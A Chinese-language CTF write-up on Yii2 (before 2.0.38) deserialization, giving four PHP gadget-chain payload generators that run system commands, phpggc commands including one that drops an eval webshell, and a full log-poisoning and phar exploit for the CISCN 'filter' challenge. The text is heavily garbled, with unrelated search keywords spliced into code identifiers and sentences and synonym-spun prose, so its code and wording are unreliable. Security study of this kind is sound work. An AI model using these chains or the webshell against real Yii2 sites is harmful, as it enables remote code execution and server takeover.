通过几道CTF题学习yii2框架

简介

Yii是一套基于组件、用于开发大型 Web 运用的高性能 PHP 结构，Yii2 2.0.38 之前的版别存在反序列化缝隙，程序在调用unserialize()时，攻击者github可经过结构特定的歹意央求履行任意指令，本篇就剖析一下yii2运用链以及怎样自己去结构payload，并结合CTF标题去学习yii2结构

Yii2＜2.0.38反序列化

设备：在 github.com/yiiso测验用例ft/yii… 下载2.0.37的版别

然后在 yshellyii-basic-app-2.0.37basicconfigweb.php里边往cookieValidationKey随意给点值，运转 php yii sphp35erve，新建一个控制器

yii-basic-app-2.0.37basiccontrollersTestController.php

<?php
namespagithub是干什么的ce appcontrollers;
use yiiwphpmyadminebController;
class TestController extends ContrPHPoller{
public function actionTest($name){
return unserialize($name);
}
}

就能够进行测验了

?r=test/testphp文件用什么软件翻开&name=

链一

链的进口在

yii-bashell指令sic-app-2.0.37basicvendoryiisoftyii2dbBatchQueryResult.php

public function __destruphp7ct()
{
// make sure cursor is closed
$this->reset(测验怀孕的试纸图片一深一浅);
}

跟进$this->resegiti轮胎t();

public function reset(测验你的自卑程度)
{
if ($this->_daShelltaReader !== null) {
$thisshell怎样读->_dataReader->close();
}

这儿的$this->_dataReader可控，并调用了close()办法，那么能够找到一个类不存在close()办法，但存在__call办法就能够调用他了

在yii-basic-app-2.0.37basicvshellyendoryiisoftyii2-giisrcGenerator.php测验用例

public function __call($methodshell是什么意思中文, $attributes)
{
return $this->format($method, $attributes);
}

这儿的$method为close，$attributes为空，继续跟进format

publishellfishc function format($formatter, $arguments = arrayphp文件用什么软件翻开())
{
return call_usershell脚本_func_array($this-&gtgiti轮胎;getFormatter($formatter), $argumentsshell脚本编程100例);
}gitlab

跟进getFormatter

public function getFormatter($formatter)
{
if (isset($this->formatthtml代码ers[$formatter])) {
return $this->formatters[$formatter];
}

似曾相识的代码，laravel5.8某条链就呈现过，这儿$this->formatters可控，也便是$thshellfishis->ghtml网页制造etFormatter($formatter)这这个可控php文件用什么软件翻开，可是$argume测验你的自卑程度nts的值咱们无法控制，值为空

到这儿能够履行phpinfo了

<?php
namespace yiidb{
class BatchQueryResult{
private $_dataReadegithub中文官网网页r;
public function __cophp是前端仍是后端nstruct($_dataReader) {
$this->_dataReader = $_dataReader;
}
}
}
namespace Faker{
class Generator{
protected $formatter测验怀孕的试纸图片一深一浅s = array();
public function __construct($formatters) {
$this->formatters = $formatters;shell的意思
}
}
}
ngithub是干什么的amespace {
$a = new FakerGenerator(array('close'=>'phpinfo'));
$b = new yiidbBatchQueryResult($a);
print(urlencode(serialize($b)));
}

可是我html是什么意思们想要rce的话，还要在yii2中已有的github永久回家地址无参办法中进行发掘

这儿咱们能够运用正则匹配直接查找含有call_u测验郁闷程度的问卷ser_function的无参函数

call_user_func($this->([a-zA-Z0-9]+), $this->([a-zA-Z0-9]+)

然后找到下面两个都比较好用

yihtml个人网页完好代码i-basShellic-app-2.0.37basicvendoryiisoftyii2restIndexAction.php
publicgitee function run()
{
if ($this->checkAccess) {
call_userhtml简略网页代码_func($this->checkAccess, $this->id);
}
return $this->prepareDataProvider();
}
yii-basic-shell的意思app-2.0.37basicvendoryiisoftyii2restCreateAction.php
public function run()
{
if ($this->checkAccess) {
call_user_func($thisshellfish-&ghtml5t;checkAccess, $this->idhtml网页制造);
}

这儿的$this->checkAccess和$this->id都是咱们可控的

所以直接结构就行了

<?php
namespace yiidb{
class BatchQueryResult{
private $_dataReader;
public fphp35unction __construct($_dataReader) {
$this->_dataReahtml标签der = $_dataReadhtml标签特点大全er;
}
}
}
namespace Faker{
class Generatorphp是什么{
protected $formatters = array(shell的意思);
public function __construct($formatters) {
$this-html是什么意思>formatters = $formatters;
}
}
}
namespace yiirest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct($checkAchtml标签特点大全cess,$id){
$this->checkAccesshtml网页制造 = $checkAccess;
$this->id = $id;
}
}
}
namespace {
$c = new yiirestCreateAction('system','whoami');
$b = new FakerGenerator(array('close'=>array($c, 'run')shell怎样读));
$a = new yiidbgithub永久回家地址BatchQueryResult($b);
print(urlencode(serialize($a)));
}

链二

这个是yii2 2.0.37的另外一条链

起点和链一相html同，是BatchQueryResulshell脚本编程100例t类php是什么言语的__destruct，然后是$this->_datshellfishaHTMLReader->closshell怎样读e()，可是这儿不找__call，咱们去找存在close办法的类

找到yii-basic-app-2.0.37basicvendoryiisoftyii2webDbSession.php

class DbSession extends MultiFieldSession
{
...
public function closehtml个人网页完好代码()
{
if ($this->getIsActive()) {
// prepare writeCallback fields before session closes
$this-html代码>fields = $this->composeFields();

这儿跟进$this->composeFieshell指令lds()

abstract class MultiFieldSession extends Session
{
protected function composeFields($id = null, $data = null)
{
$fields = $this->writeCphpstudyallback ? call_user_func($this->writeCahtml标签llback, $this) : [];

这儿$tphp是前端仍是后端his->writeCallback可控，$this是html是什么意思一个目标shell指令，所以这儿调phpinfo的话应该不可，不html过能够续上链一的run办法（即那个无参的办法）

这测验用例儿直接结构即可

<?php
namespace yiidb{
class BatchQueryResult{
private $_dgithub中文官网网页ataReader;
public function __construct($_dataReader测验郁闷症) {
$this->_dataReader = $_dataReader;
}
}
}
namespace yiiweb{
class DbSession{
public $writeCallback;
public funphp中文网ction __construct($writeCallbacPHPk) {
$this->writeCallback = $writeCallback;
}shell编程
}
}
namespace yiirest{
class CreateAction{
publphpstudyicshell是什么意思中文 $checkAccess;
pub测验工程师lic $id;
publ测验手机是否被监控iphp文件用什么软件翻开c function __construct($checkAccess,$ihtml5d){
$this->checkAccess = $checkAccess;
$this->id = $id;
}
}
}
namespace {
$c = new yiirestCreateAction('system','whoami');
$b = nephpstudyw yiiwebDbSession(array($c, 'run'));
$a = new yiidbBatchQueryResult($b);
print(urlen测验你的自卑程度code(serializePHP($a)));
}

链三

咱们能够在yii2 2.0.38的commit看到他加了一个__wakeup

这儿约束了链一的起点BatchQueryResult无法运用，后边的__call的链没有被损坏，所以咱们继续寻觅一个__destruct

yii-basic-app-2.0.37basicvendorcodeceptioncodeceptionextRun测验手机是否被监控Proces测验s.php

public function __desphp钱银truct()
{
$this->stopProcess();
}

这儿继续跟进stopProcess

public function stopProcess测验纸怎样看是否怀孕()
{
foreach (array_reverse($this->prphp35ocesses)shell脚本编程100例 as $process) {
/** @var $process Process  **/
if (!$process->isRunning()) {
continue;
}

这儿的$this-&g测验用例t;processes可控，所以能够运用$prhtml5ocess->isRunning()来进行触发__call

后边的运用就和链一相同了

<?php
namespace CodeceptionshellyExtension{
clasHTMLs RunProcess{
private $processgiti轮胎es = [];
public function __constructshell编程($processes) {
$this->processes[] = $processes;
}
}
}
namespace Faker{
class Generator{
protected $formatters = array();
public function __construct(php是什么$formatters) {
$this->formatters = $formatters;
}
}
}
namespace yiirest{
class CreateAction{
public $checkAccess;
public $id;
public functihtml文件怎样翻开ongitee __construct($checkAccess,$id){
$this->checkAccess = $checkAccehtml文件怎样翻开ss;
$this->id = $id;
}
}
}
namegitlabspace {
$c = new yiirphp35estCreateAction('system'html代码,'whoami');
$b = nhtml代码ew FakerGeneratphp是前端仍是后端or(array('isRunning'=>array($c, 'run'))测验纸怎样看是否怀孕);
$a = new CodeceptionshellfishExtensionRunProcess($b);
print(urlencode(serialize($a)));
}

链四

相同的先找__destruct

yii-basic-app-2.0.37测验工程师basicvendorswiftmailhtml标签特点大全erswiftmailerlibclasse测验你的自卑程度sSwiftKeyCacheDiskKeyCache.php

public function __destruct()
{
foreach ($this->keys as $nsKey => $null) {
$this->clearAll($nsKey);
}
}

这儿$nsKey可控，跟进clearAll

publ测验怀孕的试纸图片一深一浅ic function clearAll($nsKey)
{
if (aphp钱银rray_key_exists($nsKey, $thphp35is-&gtHTML;keys)) {
foreach ($this->keys[$nsKey] as $itemKey => $null) {
$this-测验网速>clearKey($nsKshell脚本根本指令ey, $itemKey);
}
if (is_dir($this->path.'/'.$nsgithub中文官网网页Key)) {
rmdir($this->path.'/'.$nsKey);
}
unset($this->keys[$nphp中文网sgitiKey]html5);
}
}

这儿没有触发__call的当地，可是存在字符串的拼接，能够触发__t测验郁闷症oString

随意找找就找到了yii-basic-app-2.0.3giti7basicvendorcodeceptioncodeceptionsrcCodecepshell脚本根本指令tionUtilXmlBuilder.php

public function __toString()
{
return $this->__dom__->saveXML();
}

相同用github永久回家地址他去触发__call

<?php
namespace {
clhtml个人网页完好代码ass Swift_KeyCache_DiskKeyCache{
private $github中文官网网页patGith;
private $keys = [];
public function __测验你的自卑程度construct($path,$keys) {
$this->path = $path;
$this->keys = $keys;
}
}
}
namespace CodeceptionUtil{
class XmlBuigitilder{
protected $__dom__;
public function __construct($__dom__) {
$this->__dom__ = $__domhtml5__;
}
}
}
namespace F测验aker{
class Generphp是什么ator{
protected $phpstudyformatters = array();
public functionhtml简略网页代码 __construct($formshell脚本atter测验s) {
$this->formatters = $formatters;
}
}
}
namespace yiirest{Shell
class CreateAction{
public $checkAccess;
public $id;
public functi测验用例on __construct($checkAccess测验,$id){
$thigithub是干什么的s->checkAccess = $checkAccess;
$this->id = $id;
}
}
}php是前端仍是后端
namespace {
$c = newhtml标签特点大全 yiirestCreatphp中文网eAction('system','whoami');
$b = new FakerGenerator(arrashell是什么意思中文yHTML('saveXphpstudyML'=>Shellarray($c,'php是前端仍是后端run')));
$a = new CodeceptionUtilXmlBuilder($b);
$d = new Swift_KeyCache_DiskKeyCache($a,array('kawhi'=>'kawhi'测验你的自卑程度));
print(urlencode(serialize($d)));
}

phpggc

运用./phpggc -l yii2能够看到有两条html代码yii2的链

能够运用如下指令快速得到链，-u指url编码

./phpggc Yii2/RCE1 system id -u

phpggc的链二的结束是一个eval，所以这儿能够直接写shell，-b指base64编码

./phpggc Yii2测验网速/RCE2 'file_put_contents("shelshell怎样读l.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbMV0pPz4="));' -b

CTF标题

[HMBCTF 2021]framework

把标题附件解压，看到htmlcontrollersSiteController.php

class SiteController extends Controller
{
public fGitunction actionAbout($message = 'Hello')
{
$data = base64_decode($message);
unserialize($data);
}

这儿能够这样传参

?shellfishr=site/about&messagehtml=

拿链一打了一下，发现一下system等shell的意思函数被ban

这儿用phpggc yii2Shell的链二写一shell怎样读个shell进去，然后用蚁剑的 apache/mod 绕 disable，运转 /readflag 即可获取 flag

[CISCN2021 Quals]filtegit指令r

听说这是配置文件gitee里边的重要html是什么意思内容，或许对你有用！！

        'log' => [
'traceLevel' => YII_DEBUG ? 0 : 0,
'targets' => [
[
'class' => 'github永久回家地址yiilogFileTarget',
'levels' => ['error'],
'logVgithubars' => [],
],
],
],

看到附件的SiteController.php就改了这个当地

public function actionIndex()html简略网页代码
{
$filphpstudye = Yii:php7:$app->request->get('fiphp中文网le');
$res = file_get_contehtml文件怎样翻开nts($file);
file_put_contents($filhtml代码e,$res);shell指令
return $this->render('index');
}

yihtml标签特点大全i结构的runtime/logs目录下有一个app.log

看一下依靠发现monolog契合

"require": {
"php": ">=5.6.0",
"yiisoft/yii2": "~2.0.14",
"yiisoft/yii2-bootstrap": "~2.0.0",
"yiisoft/yii2-swiftmailer": "~2.0.0 || ~2.1.0",
"mophp是前端仍是后端nolog/monolog":"1.19"
},

首要清空日志文件

?htmlfile=php://filter/write=convert.iconv.utf-8.utf-16be|conhtml标签vert.quoted-printable-encodeshell的意思|convert.icogiteenv.utf-16be.utf-8|convert.base64-decode/resource=../runtime/logs/git指令app.log

phpggithub中文官网网页gc生成

php -d'phar.readonly=0' ./phpggc Monolog/html简略网页代码Rphp钱银CE1 "phpinfo" "1" --phar phar -o php://output | base64php是什么 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i)github中文官网网页)[2:].zfill(2) + '=00' for i in sys.stdin.read()])html标签特点大全.upper())"

写入日志，留神最终测验郁闷症边要加个字符a

/?file==50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2Bshell脚本=00=44=00=51=00=71=00=39=00=41=00=67=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41shell怎样读=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=6Dphp是什么=00=41=00=67=00=41=00=41=00=54测验=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49github中文官网网页=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76html代码=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33php钱银=00=4D=00=36=00=4F=00=54=00=phpmyadmin6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=3测验网速0=00=49=00=6AShell=00=7shell是什么意思中文4=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4Aphp是什么=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45github中文官网网页=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A测验郁闷程度的问卷=00=63PHP=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=html标签特点大全49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6shell脚本F=00=78=00=4D=00=44html代码=00=6F=00=69=00=41=00=43=00=6F=00=41=00=测验怀孕的试纸图片一深一浅61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=6github9=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4Aphp7=00=31=00=5APHP=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=7shell怎样读3=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=html500=6F=00=69=00=41=00=github43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=php700=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67github是干什么的=00=41Git=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6AGit=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=shell脚本37=00=63=00=7Ashell指令=00=6F=00=78=00=4F=00=69=00=49=00=78=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=55=00=36=00=49=00=6D=00=78=00=6C=00=64=00=6D=00=56=00=phpmyadmin73=00=49=00=6A=00=74=00=4Fphp是前端仍是后端=00=4F=00=33=00=31=00=39html代码=00=63=00=7A=00=6F=00=34=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42gitlab=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74测验工程师=00=7Agiti=00=4F=00=6A=00=45=00=3shelly0=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=70=00=62=00=6D=00=6C=00=30=00=61=00=57=00=46=00=73=00=61测验你的自卑程度=00=58=00=70=00=6Cshell脚本根本指令=00=5A=00=43=00=49=00=37=00=59=00=6A=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67html标签特点大全=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=78=00=70=00=62=00=57=00=6C=00=30=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=html网页制造71=00=41html简略网页代码=00=48=00=HTML42=00=79=00=62=00=32=00=4E测验郁闷程度的问卷=00=6C=00=63=00=33=00=4E=00=7github是干什么的6=00=63=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69giti=00=59=00=33=00=56=00=79=00=63=00=6D=00=56=00=75=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=html个人网页完好代码6F=00=69=00=63=00=47测验工程师=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=shell怎样读00=49=00=37=00=66=00=58=00=31=00=7Ahtml网页制造=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41php中文网=00=4B=00=67shell编程=00=42=00=测验工程师69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=54=00=61=00=58=00=70=00=6C=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=32=00=6shell是什么意思中文Bphp7=00=36=00=4D=00=44=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36shellfish=00=4Dhtml标签=00=44=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49测验郁闷症的20道题=00=6A=00=45=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=54=00=6F=00=69=00=62=00=47=00=56=00=32=00=5A=00=57=00=测验你的自卑程度77shellfish=00=69=00=4F=00=30=00=34=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=67=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=78=00=6C=00=64=00=6D=00=56=00=73shell是什么意思中文=00=49gitee=00=6A=00=74=00=4F=00=4Fphp是什么言语=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=4html标签特点大全1=00=71=00=41=00=47=00=6C=00=75=00=61=00=58html标签=00=52=00=70=00=59=00=57=00=78=00=70=00=65=00=6D=00=56=00=6B=00=49=00=6A=00=74=00=69=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F测验=00=78=00=php是前端仍是后端4E=00=44=00=6F=00=69=00=github中文官网网页41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=54=00=47=00=6C=00=74=00=61=00=58=00=51=00=69=00=4F=00=32=00=6shell指令B=00=36=00=4C=00=54=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63HTML=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=32=00=39=00=79测验网速=00=63=00=79=00=49=00=37=00=59=00=54测验工程师=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=github是干什么的7A=00=6F=00=33=00=4F=00=69shell编程=00=4A=00=6A=00=64=00=58=00=4A=00=79=00=php355A=00=57=00=35=00=30=00=49=00=6A=00=74=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=77=00=61=00=48=00=42=00=70=00=62=00=6D=00=5A=00=76php7=00=49=00=6A=00=74=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=测验郁闷程度的问卷00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=47=00=59=00=61=00=33=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=测验郁闷症45=00=41shell脚本编程100例=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=5shell脚本编程100例1=00=45=00=41=00=41=00=41=00=41=00=47=00=59=00=61=00=33=00=59=00=41=00=51=00=41=00=41=00=41=00=html标签41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45PHP=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47giti=00=56=00=7A=00=64测验郁闷症=00=4A=00=41=00=61=00=shell的意思47=00=73=00=75=00=53=00=31=00=47=00=68=00=54=00=49=00=2B=00=6B=00=4B=00=58=00=33=00=45=00=68=00=2B=00=4D=00=44=00=71=00=54=00=76=00=6E=测验工程师00=6F=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=测验郁闷症54=00=55=00=49=00=3D=00a

保存phar的内容

/?file=php://filter/wrihtml文件怎样翻开te=convegithub永久回家地址rt.quoted-测验怀孕的试纸图片一深一浅printablshell指令e-decode|convert.ichtml个人网页完好代码onv.utf-16le.utf-8|convert.base64-decodphp文件用什么软件翻开e/resource=../runtime/logithubgs/apphp是什么p.log

最终用phar协议打一下gitee

/?file=phar://../runtime/logs/app.log/test.txt

然后在根目录找到This_is_flaaagggg

然后用这个找一下flag即可

php -d'phar.readonly=0' ./phpggc Monolog/RCE1 "system" "cat /This_is_flaaagggg" --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())"

本文触及相关试验：PHP反序列化缝隙试验 （经过本次试验，我们将会明白什么是反序列化缝隙，反序列化缝隙的成因以及怎样发php35掘和防备此类缝隙。